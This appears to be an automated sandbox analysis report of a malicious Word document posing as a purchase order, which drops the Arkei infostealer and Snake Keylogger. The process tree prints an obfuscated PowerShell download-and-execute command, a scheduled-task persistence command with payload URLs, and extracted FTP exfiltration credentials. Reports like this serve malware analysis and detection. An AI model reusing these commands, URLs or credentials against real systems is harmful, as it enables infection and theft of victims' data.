Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 19:08

General

  • Target

    Purchase Order (Ref M050417).docx

  • Size

    169KB

  • MD5

    f3507e52fb0692a6fbac4afdc60b0f84

  • SHA1

    11ecc242faa42035b8a98e564b6a93eeaaf15338

  • SHA256

    21dcb10cb40e5357959aaed507513d8e04e72ba0e348c91288beeb8a00340c42

  • SHA512

    8f67a97360b12fc2cdd3bf0f24becc3c39719de58c93a52de47916a9a86445ab5ffb672d06f7be95604034aa3e0861bfa6f1a6a2f7a151179b46722a86716e67

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper
    https://www.mediafire.com/file/66qmupxl6a3kglz/12.dll/file

Extracted

  • Family
    arkei
  • Botnet
    Default

Extracted

  • Family
    snakekeylogger

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://103.153.77.98/
  • Port:
    21
  • Username:
    jfhgjuere12
  • Password:
    hdhddjhfu1299

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger Payload 3 IoCs
  • suricata: ET MALWARE Generic gate .php GET with minimal headers

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Purchase Order (Ref M050417).docx" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4872
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        2⤵
        PID:3152
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2140
      • C:\Windows\SYSTEM32\WSCRIPT.exe
        WSCRIPT C:\Users\Public\update.js
        2⤵
        • Process spawned unexpected child process
        PID:4216
  • C:\ProgramData\ddond.com
    C:\ProgramData\ddond.com https://www.mediafire.com/file/p4sw0y0ung9ic20/11.htm/file
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1456
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/66qmupxl6a3kglz/12.dll/file'))));Invoke-Expression $MMMMMMM
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2360
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lokzhuqn\lokzhuqn.cmdline"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4212
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9073.tmp" "c:\Users\Admin\AppData\Local\Temp\lokzhuqn\CSC90B3E645FA40D481B453D5359E403D.TMP"
                4⤵
                PID:1792
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
            3⤵
            PID:764
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
            3⤵
            • Drops file in System32 directory
            PID:3452
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
            3⤵
            • Drops file in System32 directory
            PID:4992
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2084
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
            3⤵
            PID:4632
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
            3⤵
            PID:704
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 83 /tn calsaasdendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/gvivg655kt9dd90/11.htm/file"""
        2⤵
        • Creates scheduled task(s)
        PID:2712
      • C:\Windows\System32\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:980
      • C:\Windows\System32\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4320
      • C:\Windows\System32\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2212
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:5108

            Network

            MITRE ATT&CK Enterprise v6

            Downloads

            • C:\ProgramData\ddond.com

              Filesize

              14KB

              MD5

              0b4340ed812dc82ce636c00fa5c9bef2

              SHA1

              51c97ebe601ef079b16bcd87af827b0be5283d96

              SHA256

              dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

              SHA512

              d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE

              Filesize

              471B

              MD5

              67959c8297613f7ab757045cc4e57e61

              SHA1

              1ea5cfa474f59bf75379378c067531ad6677986d

              SHA256

              ec90b37e1c28505bc09f6e9974a8b34ddf7fcc9e8f7ed98c7db09628aa961625

              SHA512

              03ebaa7e41120648e6b5bc9cb20e7d69e35e9d5fb26beba60c870015b0dc81cdea1da7c2a558f1e15847fc43b78566eaf1752406de741319f55d7d4fe0fa3309

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE

              Filesize

              416B

              MD5

              bd290f0760a52f6662a26848ef957e53

              SHA1

              4e4a0d12b0a85eaff64a5cce0c24a4bd17a231e3

              SHA256

              04d3f4061d38997a538cce4836a1ef4c5f77138cabe0ed55f4757922affece42

              SHA512

              79faf051d531f6f5ce9982b06657f81e9fe733f64ee4b7919f09e4e6be24683c731a425b1bb83a6f84f73500820096c39c9d31ae5642eee4baa43a3fbe635942

            • C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\A6DCAFEE-A9FF-4397-A591-E834B1A75A43

              Filesize

              145KB

              MD5

              3b3c452181e1a707509438582fbf75d2

              SHA1

              190e5247e7465588527dcdccb48c4434983007e8

              SHA256

              607d36b800b6f254efc24c6ba7ed6ae12f4cff39231d6903d57a6877fbd7cd03

              SHA512

              689f9f838d39644669b46682c58900edc0b41e4d83ab954afb4b05ebf00278faeaa2ab2ba5ec41496150202500e932c4527cb3fbd1c4809bcfe116be1117d966

            • C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

              Filesize

              303KB

              MD5

              3775d965d0083409739f9e27918ec12a

              SHA1

              409fa9f4fe3d3810d5181e1ad9c0ee8bb556df48

              SHA256

              68f47c97290d8f5e8090c3552863ab12de0803f2da8c53cb0164cb18204f1031

              SHA512

              1f2623f9da2c3dfdd6b372671a8260bd52eb19a2ec9dfc561d551a5a33076d8e5df3818f7fcc58ebe196181471f034d314b8de3b6cba67b8acad4e2f81a5d015

            • C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

              Filesize

              4KB

              MD5

              f138a66469c10d5761c6cbb36f2163c3

              SHA1

              eea136206474280549586923b7a4a3c6d5db1e25

              SHA256

              c712d6c7a60f170a0c6c5ec768d962c58b1f59a2d417e98c7c528a037c427ab6

              SHA512

              9d25f943b6137dd2981ee75d57baf3a9e0ee27eea2df19591d580f02ec8520d837b8e419a8b1eb7197614a3c6d8793c56ebc848c38295ada23c31273daa302d9

            • C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal

              Filesize

              48KB

              MD5

              c8166f4123cf1820c7a220cd0c162b08

              SHA1

              9e47569fc1d4f31e2e89404fd58d812e0e74fcad

              SHA256

              3dd014046b1e414f30fcb5b70ec7d59b653a9a88967043dfaaae3f760d936736

              SHA512

              58b15736f737be5e74b37ca12f146d640937c533da0910b69c0586e73917aba3aa2cf4cce79569340481d9ac3f29eb7bb265776d7b0ab9bcabef3b6fc92fa480

            • C:\Users\Admin\AppData\Local\Temp\RES9073.tmp

              Filesize

              1KB

              MD5

              1639723d6bbea65e25dc45da667432cc

              SHA1

              5d312928e2d912be72312b02caf4b08bd611c0fd

              SHA256

              bbbe0b01ccdea5dfd09693b5d3c05b3bd245219933d843e4891e97ad0ac6c85d

              SHA512

              84e40a3ebad2112ae68d14c10dee57d53143c4f5085128f425fbcab9c23b0c9ebc7c00fdf21b55d833cbad61a129ad3b23396c15a6bbcdfbf4aca7922cf28d1b

            • C:\Users\Admin\AppData\Local\Temp\lokzhuqn\lokzhuqn.dll

              Filesize

              3KB

              MD5

              c31656411938a4580cb1eea284b18f41

              SHA1

              e69ad9d25bd3db70d582b7593e83cb19e968778c

              SHA256

              80e9aeb36f5ce03f569acabbece4b3cd47d85c3130a85c511c5ad1a97798ca04

              SHA512

              9b863740c28b89b683abe87df6ad1f1183663a12bfdce8ccacca56f691f3ca38f156c8fe19b5afceb24bb550acae55d5590b4dff9fd952267a6f3a788b2a498c

            • C:\Users\Public\update.js

              Filesize

              4KB

              MD5

              ce4bb33999f34d057959725ce8d028ba

              SHA1

              85b6ed8ded31a2870fe96a556e1594782daabf46

              SHA256

              f149e789ea4ef38502f65f6e6055d471f4feea132e4d90d41df721552f47efe4

              SHA512

              704afb2acc6c6c3fb78cb1df38a8cffe83d7bee8b69ae7d44fa74128720739b005229a9b9968b469a70143244e0dc86480fddf1aabb980501894c1d9f5596d5b

            • \??\c:\Users\Admin\AppData\Local\Temp\lokzhuqn\CSC90B3E645FA40D481B453D5359E403D.TMP

              Filesize

              652B

              MD5

              bdc93d04c0121299f338726cc9782b20

              SHA1

              36b93224e9157aedcb584031449d94bde331beae

              SHA256

              2ee57205a4aa99f6be7ae8a2f4a20768be54f24aa69902fc11c91cee933f24d5

              SHA512

              90e7b6b5ff68ec8ab02789d9db2f742aa67203e0a8e0b3fc0c3f1c7fe6912d4364401ed99d702cc2e142a6829e8f7c8f9fbad2a56cc1430d07eab48383be4703

            • \??\c:\Users\Admin\AppData\Local\Temp\lokzhuqn\lokzhuqn.0.cs

              Filesize

              840B

              MD5

              268033bad46157d9949101dfdbd69f95

              SHA1

              14a7532c9470d058536ff71251abc55320dee08e

              SHA256

              17b8a040220f09bb5eeb9530460b8e7ab64eafabef7623dec029158d9f7faf7f

              SHA512

              09c43d5277e41983127be6fc2b915ff506e461a8847b4bd25446d1b7db63085f59fb5c342771bf730b913aa46150912919190c86960d33d96d4c513163f0068b

            • \??\c:\Users\Admin\AppData\Local\Temp\lokzhuqn\lokzhuqn.cmdline

              Filesize

              369B

              MD5

              24c4ced131f1b65d1171cb681c28f7a2

              SHA1

              7e2fcc6ca0b7fdac26fcd4b36e488c1ff1897772

              SHA256

              2398feb1e843be4362609071ca08a902e1e6eabaf04ce67358430120b692c729

              SHA512

              7f6190f9c5a4ae8b885545fab506ad4f12a62fa70f614f397665290193abc14705cff7d7f835eb724cecedad3800695d3c022b2e9eeef49392ba571179eb234b
